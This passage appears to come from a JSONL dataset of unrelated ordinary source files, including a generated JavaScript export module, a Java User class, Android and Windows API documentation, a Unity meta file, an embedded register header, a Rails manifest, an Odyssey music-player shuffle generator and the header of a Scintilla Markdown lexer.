422;\nexport let a423 = 423;\nexport let a424 = 424;\nexport let a425 = 425;\nexport let a426 = 426;\nexport let a427 = 427;\nexport let a428 = 428;\nexport let a429 = 429;\nexport let a430 = 430;\nexport let a431 = 431;\nexport let a432 = 432;\nexport let a433 = 433;\nexport let a434 = 434;\nexport let a435 = 435;\nexport let a436 = 436;\nexport let a437 = 437;\nexport let a438 = 438;\nexport let a439 = 439;\nexport let a440 = 440;\nexport let a441 = 441;\nexport let a442 = 442;\nexport let a443 = 443;\nexport let a444 = 444;\nexport let a445 = 445;\nexport let a446 = 446;\nexport let a447 = 447;\nexport let a448 = 448;\nexport let a449 = 449;\nexport let a450 = 450;\nexport let a451 = 451;\nexport let a452 = 452;\nexport let a453 = 453;\nexport let a454 = 454;\nexport let a455 = 455;\nexport let a456 = 456;\nexport let a457 = 457;\nexport let a458 = 458;\nexport let a459 = 459;\nexport let a460 = 460;\nexport let a461 = 461;\nexport let a462 = 462;\nexport let a463 = 463;\nexport let a464 = 464;\nexport let a465 = 465;\nexport let a466 = 466;\nexport let a467 = 467;\nexport let a468 = 468;\nexport let a469 = 469;\nexport let a470 = 470;\nexport let a471 = 471;\nexport let a472 = 472;\nexport let a473 = 473;\nexport let a474 = 474;\nexport let a475 = 475;\nexport let a476 = 476;\nexport let a477 = 477;\nexport let a478 = 478;\nexport let a479 = 479;\nexport let a480 = 480;\nexport let a481 = 481;\nexport let a482 = 482;\nexport let a483 = 483;\nexport let a484 = 484;\nexport let a485 = 485;\nexport let a486 = 486;\nexport let a487 = 487;\nexport let a488 = 488;\nexport let a489 = 489;\nexport let a490 = 490;\nexport let a491 = 491;\nexport let a492 = 492;\nexport let a493 = 493;\nexport let a494 = 494;\nexport let a495 = 495;\nexport let a496 = 496;\nexport let a497 = 497;\nexport let a498 = 498;\nexport let a499 = 499;\nexport let a500 = 500;\nexport let a501 = 501;\nexport let a502 = 502;\nexport let a503 = 503;\nexport let a504 = 504;\nexport let a505 = 505;\nexport let a506 = 506;\nexport let a507 = 507;\nexport let a508 = 508;\nexport let a509 = 509;\nexport let a510 = 510;\nexport let a511 = 511;\nexport let a512 = 512;\nexport let a513 = 513;\nexport let a514 = 514;\nexport let a515 = 515;\nexport let a516 = 516;\nexport let a517 = 517;\nexport let a518 = 518;\nexport let a519 = 519;\nexport let a520 = 520;\nexport let a521 = 521;\nexport let a522 = 522;\nexport let a523 = 523;\nexport let a524 = 524;\nexport let a525 = 525;\nexport let a526 = 526;\nexport let a527 = 527;\nexport let a528 = 528;\nexport let a529 = 529;\nexport let a530 = 530;\nexport let a531 = 531;\nexport let a532 = 532;\nexport let a533 = 533;\nexport let a534 = 534;\nexport let a535 = 535;\nexport let a536 = 536;\nexport let a537 = 537;\nexport let a538 = 538;\nexport let a539 = 539;\nexport let a540 = 540;\nexport let a541 = 541;\nexport let a542 = 542;\nexport let a543 = 543;\nexport let a544 = 544;\nexport let a545 = 545;\nexport let a546 = 546;\nexport let a547 = 547;\nexport let a548 = 548;\nexport let a549 = 549;\nexport let a550 = 550;\nexport let a551 = 551;\nexport let a552 = 552;\nexport let a553 = 553;\nexport let a554 = 554;\nexport let a555 = 555;\nexport let a556 = 556;\nexport let a557 = 557;\nexport let a558 = 558;\nexport let a559 = 559;\nexport let a560 = 560;\nexport let a561 = 561;\nexport let a562 = 562;\nexport let a563 = 563;\nexport let a564 = 564;\nexport let a565 = 565;\nexport let a566 = 566;\nexport let a567 = 567;\nexport let a568 = 568;\nexport let a569 = 569;\nexport let a570 = 570;\nexport let a571 = 571;\nexport let a572 = 572;\nexport let a573 = 573;\nexport let a574 = 574;\nexport let a575 = 575;\nexport let a576 = 576;\nexport let a577 = 577;\nexport let a578 = 578;\nexport let a579 = 579;\nexport let a580 = 580;\nexport let a581 = 581;\nexport let a582 = 582;\nexport let a583 = 583;\nexport let a584 = 584;\nexport let a585 = 585;\nexport let a586 = 586;\nexport let a587 = 587;\nexport let a588 = 588;\nexport let a589 = 589;\nexport let a590 = 590;\nexport let a591 = 591;\nexport let a592 = 592;\nexport let a593 = 593;\nexport let a594 = 594;\nexport let a595 = 595;\nexport let a596 = 596;\nexport let a597 = 597;\nexport let a598 = 598;\nexport let a599 = 599;\nexport let a600 = 600;\nexport let a601 = 601;\nexport let a602 = 602;\nexport let a603 = 603;\nexport let a604 = 604;\nexport let a605 = 605;\nexport let a606 = 606;\nexport let a607 = 607;\nexport let a608 = 608;\nexport let a609 = 609;\nexport let a610 = 610;\nexport let a611 = 611;\nexport let a612 = 612;\nexport let a613 = 613;\nexport let a614 = 614;\nexport let a615 = 615;\nexport let a616 = 616;\nexport let a617 = 617;\nexport let a618 = 618;\nexport let a619 = 619;\nexport let a620 = 620;\nexport let a621 = 621;\nexport let a622 = 622;\nexport let a623 = 623;\nexport let a624 = 624;\nexport let a625 = 625;\nexport let a626 = 626;\nexport let a627 = 627;\nexport let a628 = 628;\nexport let a629 = 629;\nexport let a630 = 630;\nexport let a631 = 631;\nexport let a632 = 632;\nexport let a633 = 633;\nexport let a634 = 634;\nexport let a635 = 635;\nexport let a636 = 636;\nexport let a637 = 637;\nexport let a638 = 638;\nexport let a639 = 639;\nexport let a640 = 640;\nexport let a641 = 641;\nexport let a642 = 642;\nexport let a643 = 643;\nexport let a644 = 644;\nexport let a645 = 645;\nexport let a646 = 646;\nexport let a647 = 647;\nexport let a648 = 648;\nexport let a649 = 649;\nexport let a650 = 650;\nexport let a651 = 651;\nexport let a652 = 652;\nexport let a653 = 653;\nexport let a654 = 654;\nexport let a655 = 655;\nexport let a656 = 656;\nexport let a657 = 657;\nexport let a658 = 658;\nexport let a659 = 659;\nexport let a660 = 660;\nexport let a661 = 661;\nexport let a662 = 662;\nexport let a663 = 663;\nexport let a664 = 664;\nexport let a665 = 665;\nexport let a666 = 666;\nexport let a667 = 667;\nexport let a668 = 668;\nexport let a669 = 669;\nexport let a670 = 670;\nexport let a671 = 671;\nexport let a672 = 672;\nexport let a673 = 673;\nexport let a674 = 674;\nexport let a675 = 675;\nexport let a676 = 676;\nexport let a677 = 677;\nexport let a678 = 678;\nexport let a679 = 679;\nexport let a680 = 680;\nexport let a681 = 681;\nexport let a682 = 682;\nexport let a683 = 683;\nexport let a684 = 684;\nexport let a685 = 685;\nexport let a686 = 686;\nexport let a687 = 687;\nexport let a688 = 688;\nexport let a689 = 689;\nexport let a690 = 690;\nexport let a691 = 691;\nexport let a692 = 692;\nexport let a693 = 693;\nexport let a694 = 694;\nexport let a695 = 695;\nexport let a696 = 696;\nexport let a697 = 697;\nexport let a698 = 698;\nexport let a699 = 699;\nexport let a700 = 700;\nexport let a701 = 701;\nexport let a702 = 702;\nexport let a703 = 703;\nexport let a704 = 704;\nexport let a705 = 705;\nexport let a706 = 706;\nexport let a707 = 707;\nexport let a708 = 708;\nexport let a709 = 709;\nexport let a710 = 710;\nexport let a711 = 711;\nexport let a712 = 712;\nexport let a713 = 713;\nexport let a714 = 714;\nexport let a715 = 715;\nexport let a716 = 716;\nexport let a717 = 717;\nexport let a718 = 718;\nexport let a719 = 719;\nexport let a720 = 720;\nexport let a721 = 721;\nexport let a722 = 722;\nexport let a723 = 723;\nexport let a724 = 724;\nexport let a725 = 725;\nexport let a726 = 726;\nexport let a727 = 727;\nexport let a728 = 728;\nexport let a729 = 729;\nexport let a730 = 730;\nexport let a731 = 731;\nexport let a732 = 732;\nexport let a733 = 733;\nexport let a734 = 734;\nexport let a735 = 735;\nexport let a736 = 736;\nexport let a737 = 737;\nexport let a738 = 738;\nexport let a739 = 739;\nexport let a740 = 740;\nexport let a741 = 741;\nexport let a742 = 742;\nexport let a743 = 743;\nexport let a744 = 744;\nexport let a745 = 745;\nexport let a746 = 746;\nexport let a747 = 747;\nexport let a748 = 748;\nexport let a749 = 749;\nexport let a750 = 750;\nexport let a751 = 751;\nexport let a752 = 752;\nexport let a753 = 753;\nexport let a754 = 754;\nexport let a755 = 755;\nexport let a756 = 756;\nexport let a757 = 757;\nexport let a758 = 758;\nexport let a759 = 759;\nexport let a760 = 760;\nexport let a761 = 761;\nexport let a762 = 762;\nexport let a763 = 763;\nexport let a764 = 764;\nexport let a765 = 765;\nexport let a766 = 766;\nexport let a767 = 767;\nexport let a768 = 768;\nexport let a769 = 769;\nexport let a770 = 770;\nexport let a771 = 771;\nexport let a772 = 772;\nexport let a773 = 773;\nexport let a774 = 774;\nexport let a775 = 775;\nexport let a776 = 776;\nexport let a777 = 777;\nexport let a778 = 778;\nexport let a779 = 779;\nexport let a780 = 780;\nexport let a781 = 781;\nexport let a782 = 782;\nexport let a783 = 783;\nexport let a784 = 784;\nexport let a785 = 785;\nexport let a786 = 786;\nexport let a787 = 787;\nexport let a788 = 788;\nexport let a789 = 789;\nexport let a790 = 790;\nexport let a791 = 791;\nexport let a792 = 792;\nexport let a793 = 793;\nexport let a794 = 794;\nexport let a795 = 795;\nexport let a796 = 796;\nexport let a797 = 797;\nexport let a798 = 798;\nexport let a799 = 799;\nexport let a800 = 800;\nexport let a801 = 801;\nexport let a802 = 802;\nexport let a803 = 803;\nexport let a804 = 804;\nexport let a805 = 805;\nexport let a806 = 806;\nexport let a807 = 807;\nexport let a808 = 808;\nexport let a809 = 809;\nexport let a810 = 810;\nexport let a811 = 811;\nexport let a812 = 812;\nexport let a813 = 813;\nexport let a814 = 814;\nexport let a815 = 815;\nexport let a816 = 816;\nexport let a817 = 817;\nexport let a818 = 818;\nexport let a819 = 819;\nexport let a820 = 820;\nexport let a821 = 821;\nexport let a822 = 822;\nexport let a823 = 823;\nexport let a824 = 824;\nexport let a825 = 825;\nexport let a826 = 826;\nexport let a827 = 827;\nexport let a828 = 828;\nexport let a829 = 829;\nexport let a830 = 830;\nexport let a831 = 831;\nexport let a832 = 832;\nexport let a833 = 833;\nexport let a834 = 834;\nexport let a835 = 835;\nexport let a836 = 836;\nexport let a837 = 837;\nexport let a838 = 838;\nexport let a839 = 839;\nexport let a840 = 840;\nexport let a841 = 841;\nexport let a842 = 842;\nexport let a843 = 843;\nexport let a844 = 844;\nexport let a845 = 845;\nexport let a846 = 846;\nexport let a847 = 847;\nexport let a848 = 848;\nexport let a849 = 849;\nexport let a850 = 850;\nexport let a851 = 851;\nexport let a852 = 852;\nexport let a853 = 853;\nexport let a854 = 854;\nexport let a855 = 855;\nexport let a856 = 856;\nexport let a857 = 857;\nexport let a858 = 858;\nexport let a859 = 859;\nexport let a860 = 860;\nexport let a861 = 861;\nexport let a862 = 862;\nexport let a863 = 863;\nexport let a864 = 864;\nexport let a865 = 865;\nexport let a866 = 866;\nexport let a867 = 867;\nexport let a868 = 868;\nexport let a869 = 869;\nexport let a870 = 870;\nexport let a871 = 871;\nexport let a872 = 872;\nexport let a873 = 873;\nexport let a874 = 874;\nexport let a875 = 875;\nexport let a876 = 876;\nexport let a877 = 877;\nexport let a878 = 878;\nexport let a879 = 879;\nexport let a880 = 880;\nexport let a881 = 881;\nexport let a882 = 882;\nexport let a883 = 883;\nexport let a884 = 884;\nexport let a885 = 885;\nexport let a886 = 886;\nexport let a887 = 887;\nexport let a888 = 888;\nexport let a889 = 889;\nexport let a890 = 890;\nexport let a891 = 891;\nexport let a892 = 892;\nexport let a893 = 893;\nexport let a894 = 894;\nexport let a895 = 895;\nexport let a896 = 896;\nexport let a897 = 897;\nexport let a898 = 898;\nexport let a899 = 899;\nexport let a900 = 900;\nexport let a901 = 901;\nexport let a902 = 902;\nexport let a903 = 903;\nexport let a904 = 904;\nexport let a905 = 905;\nexport let a906 = 906;\nexport let a907 = 907;\nexport let a908 = 908;\nexport let a909 = 909;\nexport let a910 = 910;\nexport let a911 = 911;\nexport let a912 = 912;\nexport let a913 = 913;\nexport let a914 = 914;\nexport let a915 = 915;\nexport let a916 = 916;\nexport let a917 = 917;\nexport let a918 = 918;\nexport let a919 = 919;\nexport let a920 = 920;\nexport let a921 = 921;\nexport let a922 = 922;\nexport let a923 = 923;\nexport let a924 = 924;\nexport let a925 = 925;\nexport let a926 = 926;\nexport let a927 = 927;\nexport let a928 = 928;\nexport let a929 = 929;\nexport let a930 = 930;\nexport let a931 = 931;\nexport let a932 = 932;\nexport let a933 = 933;\nexport let a934 = 934;\nexport let a935 = 935;\nexport let a936 = 936;\nexport let a937 = 937;\nexport let a938 = 938;\nexport let a939 = 939;\nexport let a940 = 940;\nexport let a941 = 941;\nexport let a942 = 942;\nexport let a943 = 943;\nexport let a944 = 944;\nexport let a945 = 945;\nexport let a946 = 946;\nexport let a947 = 947;\nexport let a948 = 948;\nexport let a949 = 949;\nexport let a950 = 950;\nexport let a951 = 951;\nexport let a952 = 952;\nexport let a953 = 953;\nexport let a954 = 954;\nexport let a955 = 955;\nexport let a956 = 956;\nexport let a957 = 957;\nexport let a958 = 958;\nexport let a959 = 959;\nexport let a960 = 960;\nexport let a961 = 961;\nexport let a962 = 962;\nexport let a963 = 963;\nexport let a964 = 964;\nexport let a965 = 965;\nexport let a966 = 966;\nexport let a967 = 967;\nexport let a968 = 968;\nexport let a969 = 969;\nexport let a970 = 970;\nexport let a971 = 971;\nexport let a972 = 972;\nexport let a973 = 973;\nexport let a974 = 974;\nexport let a975 = 975;\nexport let a976 = 976;\nexport let a977 = 977;\nexport let a978 = 978;\nexport let a979 = 979;\nexport let a980 = 980;\nexport let a981 = 981;\nexport let a982 = 982;\nexport let a983 = 983;\nexport let a984 = 984;\nexport let a985 = 985;\nexport let a986 = 986;\nexport let a987 = 987;\nexport let a988 = 988;\nexport let a989 = 989;\nexport let a990 = 990;\nexport let a991 = 991;\nexport let a992 = 992;\nexport let a993 = 993;\nexport let a994 = 994;\nexport let a995 = 995;\nexport let a996 = 996;\nexport let a997 = 997;\nexport let a998 = 998;\nexport let a999 = 999;\nexport let a1000 = 1000;\nexport let a1001 = 1001;\nexport let a1002 = 1002;\nexport let a1003 = 1003;\nexport let a1004 = 1004;\nexport let a1005 = 1005;\nexport let a1006 = 1006;\nexport let a1007 = 1007;\nexport let a1008 = 1008;\nexport let a1009 = 1009;\nexport let a1010 = 1010;\nexport let a1011 = 1011;\nexport let a1012 = 1012;\nexport let a1013 = 1013;\nexport let a1014 = 1014;\nexport let a1015 = 1015;\nexport let a1016 = 1016;\nexport let a1017 = 1017;\nexport let a1018 = 1018;\nexport let a1019 = 1019;\nexport let a1020 = 1020;\nexport let a1021 = 1021;\nexport let a1022 = 1022;\nexport let a1023 = 1023;\nexport let a1024 = 1024;\nexport let a1025 = 1025;\nexport let a1026 = 1026;\nexport let a1027 = 1027;\nexport let a1028 = 1028;\nexport let a1029 = 1029;\nexport let a1030 = 1030;\nexport let a1031 = 1031;\nexport let a1032 = 1032;\nexport let a1033 = 1033;\nexport let a1034 = 1034;\nexport let a1035 = 1035;\nexport let a1036 = 1036;\nexport let a1037 = 1037;\nexport let a1038 = 1038;\nexport let a1039 = 1039;\nexport let a1040 = 1040;\nexport let a1041 = 1041;\nexport let a1042 = 1042;\nexport let a1043 = 1043;\nexport let a1044 = 1044;\nexport let a1045 = 1045;\nexport let a1046 = 1046;\nexport let a1047 = 1047;\nexport let a1048 = 1048;\nexport let a1049 = 1049;\nexport let a1050 = 1050;\nexport let a1051 = 1051;\nexport let a1052 = 1052;\nexport let a1053 = 1053;\nexport let a1054 = 1054;\nexport let a1055 = 1055;\nexport let a1056 = 1056;\nexport let a1057 = 1057;\nexport let a1058 = 1058;\nexport let a1059 = 1059;\nexport let a1060 = 1060;\nexport let a1061 = 1061;\nexport let a1062 = 1062;\nexport let a1063 = 1063;\nexport let a1064 = 1064;\nexport let a1065 = 1065;\nexport let a1066 = 1066;\nexport let a1067 = 1067;\nexport let a1068 = 1068;\nexport let a1069 = 1069;\nexport let a1070 = 1070;\nexport let a1071 = 1071;\nexport let a1072 = 1072;\nexport let a1073 = 1073;\nexport let a1074 = 1074;\nexport let a1075 = 1075;\nexport let a1076 = 1076;\nexport let a1077 = 1077;\nexport let a1078 = 1078;\nexport let a1079 = 1079;\nexport let a1080 = 1080;\nexport let a1081 = 1081;\nexport let a1082 = 1082;\nexport let a1083 = 1083;\nexport let a1084 = 1084;\nexport let a1085 = 1085;\nexport let a1086 = 1086;\nexport let a1087 = 1087;\nexport let a1088 = 1088;\nexport let a1089 = 1089;\nexport let a1090 = 1090;\nexport let a1091 = 1091;\nexport let a1092 = 1092;\nexport let a1093 = 1093;\nexport let a1094 = 1094;\nexport let a1095 = 1095;\nexport let a1096 = 1096;\nexport let a1097 = 1097;\nexport let a1098 = 1098;\nexport let a1099 = 1099;\n"} {"text": "/*******************************************************************************\n * Copyright (c) 2015 EclipseSource and others.\n * All rights reserved. This program and the accompanying materials\n * are made available under the terms of the Eclipse Public License v1.0\n * which accompanies this distribution, and is available at\n * http://www.eclipse.org/legal/epl-v10.html\n *\n * Contributors:\n * Holger Staudacher - initial API and implementation\n ******************************************************************************/\npackage com.eclipsesource.jaxrs.connector.example.swagger;\n\n\npublic class User {\n\n private final String name;\n private final String email;\n\n public User( String name, String email) {\n this.name = name;\n this.email = email;\n }\n\n public String getName() {\n return name;\n }\n\n public String getEmail() {\n return email;\n }\n\n @Override\n public int hashCode() {\n final int prime = 31;\n int result = 1;\n result = prime * result + ( ( email == null ) ? 0 : email.hashCode() );\n result = prime * result + ( ( name == null ) ? 0 : name.hashCode() );\n return result;\n }\n\n @Override\n public boolean equals( Object obj ) {\n if( this == obj )\n return true;\n if( obj == null )\n return false;\n if( getClass() != obj.getClass() )\n return false;\n User other = ( User )obj;\n if( email == null ) {\n if( other.email != null )\n return false;\n } else if( !email.equals( other.email ) )\n return false;\n if( name == null ) {\n if( other.name != null )\n return false;\n } else if( !name.equals( other.name ) )\n return false;\n return true;\n }\n\n}\n"} {"text": "---\n-api-id: P:Windows.Devices.Sms.SmsAppMessage.ProtocolId\n-api-type: winrt property\n-api-device-family-note: xbox\n---\n\n\n\n# Windows.Devices.Sms.SmsAppMessage.ProtocolId\n\n## -description\nThe Protocol identifier for the message.\n\n## -property-value\nThe Protocol identifier for the message. (3GPP2 only.)\n\n## -remarks\n\n## -examples\n\n## -see-also\n\n\n## -capabilities\ncellularMessaging, sms\n"} {"text": "Images, layout descriptions, binary blobs and string dictionaries can be included \nin your application as resource files. Various Android APIs are designed to \noperate on the resource IDs instead of dealing with images, strings or binary blobs \ndirectly.\n\nFor example, a sample Android app that contains a user interface layout (main.axml),\nan internationalization string table (strings.xml) and some icons (drawable-XXX/icon.png) \nwould keep its resources in the \"Resources\" directory of the application:\n\nResources/\n drawable/\n icon.png\n\n layout/\n main.axml\n\n values/\n strings.xml\n\nIn order to get the build system to recognize Android resources, set the build action to\n\"AndroidResource\". The native Android APIs do not operate directly with filenames, but \ninstead operate on resource IDs. When you compile an Android application that uses resources, \nthe build system will package the resources for distribution and generate a class called \"R\" \n(this is an Android convention) that contains the tokens for each one of the resources \nincluded. For example, for the above Resources layout, this is what the R class would expose:\n\npublic class R {\n public class drawable {\n public const int icon = 0x123;\n }\n\n public class layout {\n public const int main = 0x456;\n }\n\n public class strings {\n public const int first_string = 0xabc;\n public const int second_string = 0xbcd;\n }\n}\n\nYou would then use R.drawable.icon to reference the drawable/icon.png file, or R.layout.main \nto reference the layout/main.axml file, or R.strings.first_string to reference the first \nstring in the dictionary file values/strings.xml.\n"} {"text": "fileFormatVersion: 2\nguid: 1b295e0457695334c98721cd922e1849\ntimeCreated: 1496002504\nlicenseType: Pro\nMonoImporter:\n serializedVersion: 2\n defaultReferences: []\n executionOrder: 0\n icon: {instanceID: 0}\n userData: \n assetBundleName: \n assetBundleVariant: \n"} {"text": "/***************************************************************************//**\n * @file\n * @brief EFR32MG12P_RTCC_RET register and bit field definitions\n * @version 5.8.3\n *******************************************************************************\n * # License\n * Copyright 2019 Silicon Laboratories Inc. www.silabs.com\n *******************************************************************************\n *\n * SPDX-License-Identifier: Zlib\n *\n * The licensor of this software is Silicon Laboratories Inc.\n *\n * This software is provided 'as-is', without any express or implied\n * warranty. In no event will the authors be held liable for any damages\n * arising from the use of this software.\n *\n * Permission is granted to anyone to use this software for any purpose,\n * including commercial applications, and to alter it and redistribute it\n * freely, subject to the following restrictions:\n *\n * 1. The origin of this software must not be misrepresented; you must not\n * claim that you wrote the original software. If you use this software\n * in a product, an acknowledgment in the product documentation would be\n * appreciated but is not required.\n * 2. Altered source versions must be plainly marked as such, and must not be\n * misrepresented as being the original software.\n * 3. This notice may not be removed or altered from any source distribution.\n *\n ******************************************************************************/\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n\n#if defined(__ICCARM__)\n#pragma system_include /* Treat file as system include file. */\n#elif defined(__ARMCC_VERSION) && (__ARMCC_VERSION >= 6010050)\n#pragma clang system_header /* Treat file as system include file. */\n#endif\n\n/***************************************************************************//**\n * @addtogroup Parts\n * @{\n ******************************************************************************/\n/***************************************************************************//**\n * @brief RTCC_RET RTCC RET Register\n * @ingroup EFR32MG12P_RTCC\n ******************************************************************************/\ntypedef struct {\n __IOM uint32_t REG; /**< Retention Register */\n} RTCC_RET_TypeDef;\n\n/** @} End of group Parts */\n#ifdef __cplusplus\n}\n#endif\n\n"} {"text": "// This is a manifest file that'll be compiled into application.js, which will include all the files\n// listed below.\n//\n// Any JavaScript/Coffee file within this directory, lib/assets/javascripts, or any plugin's\n// vendor/assets/javascripts directory can be referenced here using a relative path.\n//\n// It's not advisable to add code directly here, but if you do, it'll appear at the bottom of the\n// compiled file. JavaScript code in this file should be added after the last require_* statement.\n//\n// Read Sprockets README (https://github.com/rails/sprockets#sprockets-directives) for details\n// about supported directives.\n//\n//= require rails-ujs\n//= require activestorage\n//= require turbolinks\n//= require_tree .\n"} {"text": "/*\n * Copyright (C) 2020 Team Gateship-One\n * (Hendrik Borghorst & Frederik Luetkes)\n *\n * The AUTHORS.md file contains a detailed contributors list:\n * \n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see .\n *\n */\n\npackage org.gateshipone.odyssey.models;\n\nimport android.util.Log;\n\nimport org.gateshipone.odyssey.BuildConfig;\n\nimport java.util.ArrayList;\nimport java.util.Collections;\nimport java.util.LinkedHashMap;\nimport java.util.List;\nimport java.util.Random;\n\n/**\n * This class keeps a HashMap of all artists that are part of a track list (e.g. playlist)\n * and their belonging tracks with the original list position as a pair. This can be used to\n * randomize the playback of the playback equally distributed over all artists of the original\n * track list.\n */\npublic class TrackRandomGenerator {\n private static final String TAG = TrackRandomGenerator.class.getSimpleName();\n\n /**\n * Underlying data structure for artist-track buckets\n */\n private ArrayList> mData;\n\n /**\n * Creates an empty data structure\n */\n public TrackRandomGenerator() {\n mData = new ArrayList<>();\n }\n\n private BetterPseudoRandomGenerator mRandomGenerator = new BetterPseudoRandomGenerator();\n\n private List mOriginalList;\n\n private int mIntelligenceFactor;\n\n /**\n * Creates a list of artists and their tracks with position in the original playlist\n *\n * @param tracks List of tracks\n */\n public synchronized void fillFromList(List tracks) {\n // Clear all entries\n mData.clear();\n\n mOriginalList = tracks;\n\n if (mIntelligenceFactor == 0) {\n return;\n }\n LinkedHashMap> hashMap = new LinkedHashMap<>();\n\n if (tracks == null || tracks.isEmpty()) {\n // Abort for empty data structures\n return;\n }\n\n // Iterate over the list and add all tracks to their artist lists\n int trackNo = 0;\n for (TrackModel track : tracks) {\n String artistName = track.getTrackArtistName();\n List list = hashMap.get(artistName);\n if (list == null) {\n // If artist is not already in HashMap add a new list for it\n list = new ArrayList<>();\n hashMap.put(artistName, list);\n }\n // Add pair of position in original playlist and track itself to artists bucket list\n list.add(trackNo);\n\n // Increase the track number (index) of the original playlist\n trackNo++;\n }\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Recreated buckets with: \" + hashMap.size() + \" artists\");\n }\n\n mData.addAll(hashMap.values());\n Collections.shuffle(mData);\n }\n\n /**\n * Generates a randomized track number within the original track list, that was used for the call\n * of fillFromList. The random track number should be equally distributed over all artists.\n *\n * @return A random number of a track of the original track list\n */\n public synchronized int getRandomTrackNumber() {\n // Randomize if a more balanced (per artist) approach or a traditional approach should be used\n boolean smartRandom = mRandomGenerator.getLimitedRandomNumber(100) < mIntelligenceFactor;\n\n if (smartRandom) {\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Use smart random\");\n }\n if (mData.isEmpty()) {\n // Refill list from original list\n fillFromList(mOriginalList);\n }\n\n // First level random, get artist\n int randomArtistNumber = mRandomGenerator.getLimitedRandomNumber(mData.size());\n\n // Get artists bucket list to artist number\n List artistsTracks;\n\n\n // Get the list of tracks belonging to the selected artist\n artistsTracks = mData.get(randomArtistNumber);\n\n // Check if an artist was found\n if (artistsTracks == null) {\n return 0;\n }\n\n int randomTrackNo = mRandomGenerator.getLimitedRandomNumber(artistsTracks.size());\n\n Integer songNumber = artistsTracks.get(randomTrackNo);\n\n // Remove track to prevent double plays\n artistsTracks.remove(randomTrackNo);\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Tracks from artist left: \" + artistsTracks.size());\n }\n\n // Check if tracks from this artist are left, otherwise remove the artist\n if (artistsTracks.isEmpty()) {\n // No tracks left from artist, remove from map\n mData.remove(randomArtistNumber);\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Artists left: \" + mData.size());\n }\n }\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Selected artist no.: \" + randomArtistNumber + \" with internal track no.: \" + randomTrackNo + \" and original track no.: \" + songNumber);\n }\n // Get random track number\n return songNumber;\n } else {\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Use traditional random\");\n }\n return mRandomGenerator.getLimitedRandomNumber(mOriginalList.size());\n }\n }\n\n public void setEnabled(int factor) {\n if (mIntelligenceFactor == 0 && factor != 0) {\n // Redo track buckets\n fillFromList(mOriginalList);\n } else if (mIntelligenceFactor != 0 && factor == 0) {\n // Remove track buckets\n fillFromList(null);\n }\n mIntelligenceFactor = factor;\n }\n\n private static class BetterPseudoRandomGenerator {\n /**\n * Timeout in ns (1 second)\n */\n private final static long TIMEOUT_NS = 10000000000L;\n private Random mJavaGenerator;\n\n private static final int RAND_MAX = Integer.MAX_VALUE;\n\n /**\n * Value after how many random numbers a reseed is done\n */\n private static final int RESEED_COUNT = 20;\n\n private int mNumbersGiven = 0;\n\n private int mInternalSeed;\n\n\n private BetterPseudoRandomGenerator() {\n mJavaGenerator = new Random();\n\n // Initialize internal seed\n mInternalSeed = mJavaGenerator.nextInt();\n\n\n // Do a quick check\n //testDistribution(20,20);\n }\n\n private int getInternalRandomNumber() {\n /*\n * Marsaglia, \"Xorshift RNGs\"\n */\n int newSeed = mInternalSeed;\n\n newSeed ^= newSeed << 13;\n newSeed ^= newSeed >> 17;\n newSeed ^= newSeed << 5;\n\n mNumbersGiven++;\n if (mNumbersGiven == RESEED_COUNT) {\n if (BuildConfig.DEBUG) {\n Log.v(TAG, \"Reseeded PRNG\");\n }\n mInternalSeed = mJavaGenerator.nextInt();\n mNumbersGiven = 0;\n } else {\n mInternalSeed = newSeed;\n }\n return Math.abs(newSeed);\n }\n\n int getLimitedRandomNumber(int limit) {\n if (limit == 0) {\n return 0;\n }\n int r, d = RAND_MAX / limit;\n limit *= d;\n long startTime = System.nanoTime();\n do {\n r = getInternalRandomNumber();\n if ((System.nanoTime() - startTime) > TIMEOUT_NS) {\n if (BuildConfig.DEBUG) {\n Log.w(TAG, \"Random generation timed out\");\n }\n // Fallback to java generator\n return mJavaGenerator.nextInt(limit);\n }\n } while (r >= limit);\n return r / d;\n }\n\n\n private void testDistribution(int numberLimit, int runs) {\n int[] numberCount = new int[numberLimit];\n\n for (int i = 0; i < runs; i++) {\n numberCount[getLimitedRandomNumber(numberLimit)]++;\n }\n\n // Print distribution and calculate mean\n int arithmeticMean = 0;\n for (int i = 0; i < numberLimit; i++) {\n Log.v(TAG, \"Number: \" + i + \" = \" + numberCount[i]);\n arithmeticMean += numberCount[i];\n }\n\n arithmeticMean /= numberLimit;\n Log.v(TAG, \"Mean value: \" + arithmeticMean);\n\n int variance = 0;\n for (int i = 0; i < numberLimit; i++) {\n variance += Math.pow((numberCount[i] - arithmeticMean), 2);\n }\n Log.v(TAG, \"Variance: \" + variance);\n double sd = Math.sqrt(variance);\n Log.v(TAG, \"Standard deviation: \" + sd);\n double rsd = sd / arithmeticMean;\n Log.v(TAG, \"Relative standard deviation: \" + rsd + \" %\");\n\n }\n }\n}\n"} {"text": "/******************************************************************\n * LexMarkdown.cxx\n *\n * A simple Markdown lexer for scintilla.\n *\n * Includes highlighting for some extra features from the\n * Pandoc implementation; strikeout, using '#.' as a default\n * ordered list item marker, and delimited code blocks.\n *\n * Limitations:\n *\n * Standard indented code blocks are not highlighted at all,\n * as it would conflict with other indentation schemes. Use\n * delimited code blocks for blanket highlighting of an\n * entire code block. Embedded HTML is not highlighted either.\n * Blanket HTML highlighting has issues, because some Markdown\n * implementations allow Markdown markup inside of the HTML. Also,\n * there is a following blank line issue that can't be ignored,\n * explained in the next paragraph. Embedded HTML and code\n * blocks would be better supported with language specific\n * highlighting.\n *\n * The highlighting aims to accurately reflect correct syntax,\n * but a few restrictions are relaxed. Delimited code blocks are\n * highlighted, even if the line following the code block is not blank.\n * Requiring a blank line after a block, breaks the highlighting\n * in certain cases, because of the way Scintilla ends up calling\n * the lexer.\n *\n * Written by Jon Strait - jstrait@moonloop.net\n *\n * The License.txt file describes the conditions under which this\n * software may be distributed.\n *\n *****************************************************************/\n\n#include 